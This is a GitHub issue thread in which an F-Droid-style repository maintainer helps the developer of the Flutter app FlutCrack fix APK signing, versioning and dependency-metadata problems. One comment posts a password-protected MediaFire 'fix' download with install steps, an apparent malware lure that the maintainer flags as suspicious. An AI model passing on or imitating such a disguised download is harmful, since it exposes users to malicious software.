### ISSUE TITLE
Issues with your APKs

### ISSUE THREAD

**Issue by IzzySoft** [giovanni-iannaccone/FlutCrack#12]
First, thanks for making your app available here using a F/LOSS license! I've just checked the APK if I can add the app to the [IzzyOnDroid repo](https://apt.izzysoft.de/fdroid), but found a few issues:

```
SigningBlock blobs:
-------------------
0x504b4453 (DEPENDENCY_INFO_BLOCK; GOOGLE)
```

This can easily be avoided with a small addition to the `build.gradle`:

```gradle
android {
    dependenciesInfo {
        // Disables dependency metadata when building APKs.
        includeInApk = false
        // Disables dependency metadata when building Android App Bundles.
        includeInBundle = false
    }
}
```

For some background: that BLOB is supposed to be just a binary representation of your app's dependency tree. But as it's encrypted with a public key belonging to Google, only Google can read it – and nobody else can even verify what it really contains. More details can be found e.g. here: [Ramping up security: additional APK checks are in place with the IzzyOnDroid repo](https://android.izzysoft.de/articles/named/iod-scan-apkchecks#blobs).

    package: name='com.example.flut_crack' versionCode='1' versionName='1.0.0'

Seems like all of your releases are identical then: same `versionCode` and `versionName`? I assume you rather forgot to [adjust versioning](https://github.com/giovanni-iannaccone/FlutCrack/blob/main/pubspec.yaml#L6). Could you please fix that for future releases?

Last, your signing:

```
Signer #1 certificate DN: C=US, O=Android, CN=Android Debug
Signer #1 certificate SHA-256 digest: cbb49b9a7eb55f588b9947d3080c673647982f89374207109a12df9bd550f321
Signer #1 certificate SHA-1 digest: 88e7f3b66000f478b513e47f04fc87f956858317
Signer #1 certificate MD5 digest: 8dd1407064bcdf3e5a5a7e55976fbfba
Signer #1 key algorithm: RSA
Signer #1 key size (bits): 2048
```

That's a debug key, which is not intended for APKs you want to distribute. Could you sign future APKs with a proper release key please?

Thanks in advance – and looking forward to your reply!

**Comment by giovanni-iannaccone** [comment]
Really thank you for segnalating the issue. I will solve everything tomorrow and will let you know.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by IzzySoft** [comment]
Thanks @giovanni-iannaccone – looking forward to your ping then! And I guess that comment above with the mediafire link is better ignored. I see that popping up in several issues recently (and usually it's deleted a day later or so). Opaque as it is, I'd consider it a security risk even.

**Comment by giovanni-iannaccone** [comment]
I fixed everything and edited the release 2.1, try now and let me know.

**Comment by giovanni-iannaccone** [comment]
@IzzySoft I fixed everything and edited the release 2.1, try now and let me know.

**Comment by IzzySoft** [comment]
Looks good for now, thanks a lot! But for the next release, one more adjustment is needed:

    package: name='com.example.flut_crack' versionCode='1' versionName='2.1.0'

You still have `versionCode='1'` there. This is what Android uses internally to tell versions apart, so it must be increased with each release. There are already 4 releases, so it should have been at least `4` by now. The source of the problem is [this line](https://github.com/giovanni-iannaccone/FlutCrack/blob/main/pubspec.yaml#L6):

```yaml
version: 2.1.0
```

Syntax for `version` in Flutter is `version: <versionName>[+<versionCode>]`. If `versionCode` is not set, it defaults to `1` – which is what happened here. So for the next release, assuming that would be 2.2.0, this line should read:

```yaml
version: 2.1.0+5
```

(and the integer behind the `+` then increased with each new release – how much you increase it is up to you, you just can never decrease it as that would mean a downgrade which Android would not accept).

FlutCrack will [become available here](https://apt.izzysoft.de/packages/com.example.flut_crack) with the next sync around 6 pm UTC. Be welcome to [pick a badge](https://gitlab.com/IzzyOnDroid/repo/#if-my-app-is-available-here-do-you-have-a-badge-i-can-use-to-link-to-it) to link there from your Readme if you wish :smiley:

If you want to, I can send a PR with the metadata used in Fastlane structures, so you can maintain how your app is presented (Fastlane would be checked then whenever a new release is pulled). You can use the [IzzyOnDroid Fastlane Documentation](https://gitlab.com/IzzyOnDroid/repo/-/wikis/Fastlane) for guidance on how to work with that.

**Comment by giovanni-iannaccone** [comment]
@IzzySoft man, you have to fix one thing: I am not the only author of the app; Rax-x worked with me. Can you also include his name in the author section ?
For everything else you mentioned, thank you. I will make the fixes in the next release.

**Comment by IzzySoft** [comment]
> Can you also include his name in the author section ?

Can be done. But then, clicking the author name link would only show apps where both of you are listed as authors. Guess that's only fair then, though, right? So:

```yaml
AuthorName: Giovanni Iannaccone & Rax-x
```

Effective with the next sync then.

> For everything else you mentioned, thank you. I will make the fixes in the next release.

Cool, thanks! So do you want that PR from me – or do you prefer setting up Fastlane yourself from scratch?

**Comment by giovanni-iannaccone** [comment]
> Effective with the next sync then.

Really thank you.

> So do you want that PR from me – or do you prefer setting up Fastlane yourself from scratch?

I'll try setting up Fastlane from scratch.

**Comment by IzzySoft** [comment]
Give me a ping please when Fastlane is up, so I cross-check before you tag the release?

**Comment by giovanni-iannaccone** [comment]
Yes but i think it will take some days, i have never used that

**Comment by IzzySoft** [comment]
Sure, no pressure. That's why I wrote to give me a ping once you're ready. Of course at your own pace :wink:
